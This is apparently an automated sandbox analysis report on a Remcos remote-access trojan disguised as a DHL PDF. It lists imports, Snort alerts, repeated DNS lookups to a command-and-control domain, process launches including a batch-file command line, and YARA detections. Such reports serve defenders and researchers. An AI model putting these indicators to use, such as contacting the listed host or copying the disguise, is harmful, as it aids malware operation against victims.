                            user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                            gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt
                            version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                            kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                            advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                            oleaut32.dll | GetErrorInfo, SysFreeString
                            ole32.dll | CreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
                            kernel32.dll | Sleep
                            oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                            comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                            URL | InetIsOffline

                            Possible Origin

                            Language of compilation system | Country where language is spoken | Map
                            English | United States |

                            Network Behavior

                            Snort IDS Alerts

                            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                            09/27/21-20:40:26.090744 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 49910 | 8.8.8.8 | 192.168.2.4
                            09/27/21-20:40:28.212397 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 64549 | 8.8.8.8 | 192.168.2.4
                            09/27/21-20:40:47.445765 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 61721 | 8.8.8.8 | 192.168.2.4
                            09/27/21-20:40:49.554492 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 51255 | 8.8.8.8 | 192.168.2.4
                            09/27/21-20:40:52.234039 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 61522 | 8.8.8.8 | 192.168.2.4
                            09/27/21-20:41:03.235649 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 59794 | 8.8.8.8 | 192.168.2.4
                            09/27/21-20:41:17.924951 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 53418 | 8.8.8.8 | 192.168.2.4
                            09/27/21-20:41:30.956044 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 51275 | 8.8.8.8 | 192.168.2.4
                            09/27/21-20:41:33.111673 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 63492 | 8.8.8.8 | 192.168.2.4
                            09/27/21-20:41:39.455292 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 57091 | 8.8.8.8 | 192.168.2.4
                            09/27/21-20:41:43.690538 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 54450 | 8.8.8.8 | 192.168.2.4

                            Network Port Distribution

                            TCP Packets


                            UDP Packets


                            DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 27, 2021 20:40:00.329817057 CEST | 192.168.2.4 | 8.8.8.8 | 0xaf7e | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:01.487426043 CEST | 192.168.2.4 | 8.8.8.8 | 0x72ff | Standard query (0) | bl30uw.sn.files.1drv.com | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:26.069981098 CEST | 192.168.2.4 | 8.8.8.8 | 0xd18a | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:28.191519976 CEST | 192.168.2.4 | 8.8.8.8 | 0x61d9 | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:30.296859026 CEST | 192.168.2.4 | 8.8.8.8 | 0x4be0 | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:32.554495096 CEST | 192.168.2.4 | 8.8.8.8 | 0x500f | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:35.508255959 CEST | 192.168.2.4 | 8.8.8.8 | 0x5b70 | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:35.778544903 CEST | 192.168.2.4 | 8.8.8.8 | 0x6992 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:36.340289116 CEST | 192.168.2.4 | 8.8.8.8 | 0xf6e3 | Standard query (0) | bl30uw.sn.files.1drv.com | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:37.736310959 CEST | 192.168.2.4 | 8.8.8.8 | 0xf757 | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:39.840715885 CEST | 192.168.2.4 | 8.8.8.8 | 0x941c | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:42.794097900 CEST | 192.168.2.4 | 8.8.8.8 | 0xe14e | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:44.545025110 CEST | 192.168.2.4 | 8.8.8.8 | 0xd5fc | Standard query (0) | bl30uw.sn.files.1drv.com | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:47.422678947 CEST | 192.168.2.4 | 8.8.8.8 | 0x216 | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:49.533044100 CEST | 192.168.2.4 | 8.8.8.8 | 0x813 | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:52.200242996 CEST | 192.168.2.4 | 8.8.8.8 | 0x73fa | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:54.499921083 CEST | 192.168.2.4 | 8.8.8.8 | 0x620b | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:56.794174910 CEST | 192.168.2.4 | 8.8.8.8 | 0xf61c | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:58.999835014 CEST | 192.168.2.4 | 8.8.8.8 | 0xa4a5 | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:01.101335049 CEST | 192.168.2.4 | 8.8.8.8 | 0x4f8b | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:03.211925030 CEST | 192.168.2.4 | 8.8.8.8 | 0x4880 | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:05.504503965 CEST | 192.168.2.4 | 8.8.8.8 | 0xd44d | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:07.787156105 CEST | 192.168.2.4 | 8.8.8.8 | 0xca1e | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:11.246792078 CEST | 192.168.2.4 | 8.8.8.8 | 0x97ab | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:13.486362934 CEST | 192.168.2.4 | 8.8.8.8 | 0x4556 | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:15.690439939 CEST | 192.168.2.4 | 8.8.8.8 | 0xfea6 | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:17.904463053 CEST | 192.168.2.4 | 8.8.8.8 | 0xc846 | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:20.089129925 CEST | 192.168.2.4 | 8.8.8.8 | 0x4bfd | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:22.204933882 CEST | 192.168.2.4 | 8.8.8.8 | 0x5dfd | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:24.323244095 CEST | 192.168.2.4 | 8.8.8.8 | 0x3c7 | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:26.440473080 CEST | 192.168.2.4 | 8.8.8.8 | 0x6c58 | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:28.589694023 CEST | 192.168.2.4 | 8.8.8.8 | 0xb11b | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:30.934642076 CEST | 192.168.2.4 | 8.8.8.8 | 0x29b | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:33.083949089 CEST | 192.168.2.4 | 8.8.8.8 | 0xf9b9 | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:35.215830088 CEST | 192.168.2.4 | 8.8.8.8 | 0x7da5 | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:37.323995113 CEST | 192.168.2.4 | 8.8.8.8 | 0x2de7 | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:39.433008909 CEST | 192.168.2.4 | 8.8.8.8 | 0xf6a1 | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:41.558228970 CEST | 192.168.2.4 | 8.8.8.8 | 0xc97d | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:43.668311119 CEST | 192.168.2.4 | 8.8.8.8 | 0xdadc | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:45.795187950 CEST | 192.168.2.4 | 8.8.8.8 | 0xc1b1 | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:48.034203053 CEST | 192.168.2.4 | 8.8.8.8 | 0x4ee2 | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:50.154508114 CEST | 192.168.2.4 | 8.8.8.8 | 0xd265 | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:52.264264107 CEST | 192.168.2.4 | 8.8.8.8 | 0x5e9b | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:54.373840094 CEST | 192.168.2.4 | 8.8.8.8 | 0x88b9 | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:56.481215954 CEST | 192.168.2.4 | 8.8.8.8 | 0xd752 | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:58.592732906 CEST | 192.168.2.4 | 8.8.8.8 | 0x14d1 | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:42:06.596437931 CEST | 192.168.2.4 | 8.8.8.8 | 0x1b36 | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:42:08.715605974 CEST | 192.168.2.4 | 8.8.8.8 | 0x346a | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)
Sep 27, 2021 20:42:10.826145887 CEST | 192.168.2.4 | 8.8.8.8 | 0xfb67 | Standard query (0) | ongod4ever.ddns.net | A (IP address) | IN (0x0001)

                            DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 27, 2021 20:40:00.377412081 CEST | 8.8.8.8 | 192.168.2.4 | 0xaf7e | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net |  | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 20:40:01.589236021 CEST | 8.8.8.8 | 192.168.2.4 | 0x72ff | No error (0) | bl30uw.sn.files.1drv.com | sn-files.fe.1drv.com |  | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 20:40:01.589236021 CEST | 8.8.8.8 | 192.168.2.4 | 0x72ff | No error (0) | sn-files.fe.1drv.com | odc-sn-files-geo.onedrive.akadns.net |  | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 20:40:26.090744019 CEST | 8.8.8.8 | 192.168.2.4 | 0xd18a | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:28.212397099 CEST | 8.8.8.8 | 192.168.2.4 | 0x61d9 | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:30.310684919 CEST | 8.8.8.8 | 192.168.2.4 | 0x4be0 | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:32.567531109 CEST | 8.8.8.8 | 192.168.2.4 | 0x500f | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:35.522198915 CEST | 8.8.8.8 | 192.168.2.4 | 0x5b70 | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:35.861727953 CEST | 8.8.8.8 | 192.168.2.4 | 0x6992 | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net |  | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 20:40:36.441093922 CEST | 8.8.8.8 | 192.168.2.4 | 0xf6e3 | No error (0) | bl30uw.sn.files.1drv.com | sn-files.fe.1drv.com |  | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 20:40:36.441093922 CEST | 8.8.8.8 | 192.168.2.4 | 0xf6e3 | No error (0) | sn-files.fe.1drv.com | odc-sn-files-geo.onedrive.akadns.net |  | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 20:40:37.749092102 CEST | 8.8.8.8 | 192.168.2.4 | 0xf757 | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:39.854439974 CEST | 8.8.8.8 | 192.168.2.4 | 0x941c | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:42.857904911 CEST | 8.8.8.8 | 192.168.2.4 | 0xe14e | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net |  | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 20:40:44.717713118 CEST | 8.8.8.8 | 192.168.2.4 | 0xd5fc | No error (0) | bl30uw.sn.files.1drv.com | sn-files.fe.1drv.com |  | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 20:40:44.717713118 CEST | 8.8.8.8 | 192.168.2.4 | 0xd5fc | No error (0) | sn-files.fe.1drv.com | odc-sn-files-geo.onedrive.akadns.net |  | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 20:40:47.445765018 CEST | 8.8.8.8 | 192.168.2.4 | 0x216 | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:49.554491997 CEST | 8.8.8.8 | 192.168.2.4 | 0x813 | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:52.234039068 CEST | 8.8.8.8 | 192.168.2.4 | 0x73fa | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:54.513664007 CEST | 8.8.8.8 | 192.168.2.4 | 0x620b | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:56.808721066 CEST | 8.8.8.8 | 192.168.2.4 | 0xf61c | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:59.013353109 CEST | 8.8.8.8 | 192.168.2.4 | 0xa4a5 | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:01.114439011 CEST | 8.8.8.8 | 192.168.2.4 | 0x4f8b | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:03.235649109 CEST | 8.8.8.8 | 192.168.2.4 | 0x4880 | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:05.526628971 CEST | 8.8.8.8 | 192.168.2.4 | 0xd44d | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:07.801413059 CEST | 8.8.8.8 | 192.168.2.4 | 0xca1e | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:11.259496927 CEST | 8.8.8.8 | 192.168.2.4 | 0x97ab | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:13.499980927 CEST | 8.8.8.8 | 192.168.2.4 | 0x4556 | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:15.703810930 CEST | 8.8.8.8 | 192.168.2.4 | 0xfea6 | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:17.924951077 CEST | 8.8.8.8 | 192.168.2.4 | 0xc846 | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:20.102364063 CEST | 8.8.8.8 | 192.168.2.4 | 0x4bfd | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:22.218985081 CEST | 8.8.8.8 | 192.168.2.4 | 0x5dfd | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:24.335789919 CEST | 8.8.8.8 | 192.168.2.4 | 0x3c7 | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:26.453758955 CEST | 8.8.8.8 | 192.168.2.4 | 0x6c58 | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:28.603553057 CEST | 8.8.8.8 | 192.168.2.4 | 0xb11b | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:30.956043959 CEST | 8.8.8.8 | 192.168.2.4 | 0x29b | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:33.111673117 CEST | 8.8.8.8 | 192.168.2.4 | 0xf9b9 | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:35.228498936 CEST | 8.8.8.8 | 192.168.2.4 | 0x7da5 | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:37.337399006 CEST | 8.8.8.8 | 192.168.2.4 | 0x2de7 | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:39.455291986 CEST | 8.8.8.8 | 192.168.2.4 | 0xf6a1 | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:41.570872068 CEST | 8.8.8.8 | 192.168.2.4 | 0xc97d | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:43.690537930 CEST | 8.8.8.8 | 192.168.2.4 | 0xdadc | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:45.808367014 CEST | 8.8.8.8 | 192.168.2.4 | 0xc1b1 | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:48.047791004 CEST | 8.8.8.8 | 192.168.2.4 | 0x4ee2 | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:50.166790962 CEST | 8.8.8.8 | 192.168.2.4 | 0xd265 | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:52.277652025 CEST | 8.8.8.8 | 192.168.2.4 | 0x5e9b | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:54.386415005 CEST | 8.8.8.8 | 192.168.2.4 | 0x88b9 | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:56.493730068 CEST | 8.8.8.8 | 192.168.2.4 | 0xd752 | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:58.606566906 CEST | 8.8.8.8 | 192.168.2.4 | 0x14d1 | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:42:06.612971067 CEST | 8.8.8.8 | 192.168.2.4 | 0x1b36 | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:42:08.729338884 CEST | 8.8.8.8 | 192.168.2.4 | 0x346a | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:42:10.839230061 CEST | 8.8.8.8 | 192.168.2.4 | 0xfb67 | No error (0) | ongod4ever.ddns.net |  | 185.140.53.15 | A (IP address) | IN (0x0001)

                            Behavior

                            System Behavior

                            General

                            Start time:20:39:57
                            Start date:27/09/2021
                            Path:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe'
                            Imagebase:0x400000
                            File size:1009152 bytes
                            MD5 hash:3808D4A11CBEE20896CCA28F9A3BCB9B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low

                            General

                            Start time:20:40:20
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\mobsync.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\System32\mobsync.exe
                            Imagebase:0x9d0000
                            File size:93184 bytes
                            MD5 hash:44C19378FA529DD88674BAF647EBDC3C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Author: unknown
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.938674908.0000000002EA7000.00000004.00000020.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.939914286.0000000050601000.00000040.00000001.sdmp, Author: Joe Security
                            Reputation:moderate

                            General

                            Start time:20:40:25
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
                            Imagebase:0x11d0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:20:40:25
                            Start date:27/09/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff724c50000
                            File size:625664 bytes
